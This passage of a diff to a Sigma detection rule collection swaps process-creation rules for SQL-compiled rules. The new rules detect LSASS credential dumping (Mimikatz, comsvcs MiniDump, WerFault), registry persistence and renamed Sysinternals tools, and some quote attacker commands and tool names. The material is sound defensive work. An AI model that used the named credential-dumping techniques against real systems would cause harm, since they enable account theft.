'%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nimgrab.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "status": "experimental", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", - "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "status": "test", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely, since these tools shouldn't access lsass.exe at all" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", - "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "status": "stable", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "status": "experimental", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + ], + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + }, + { + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", + "status": "test", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate security products adding their own AMSI providers. Filter these according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' 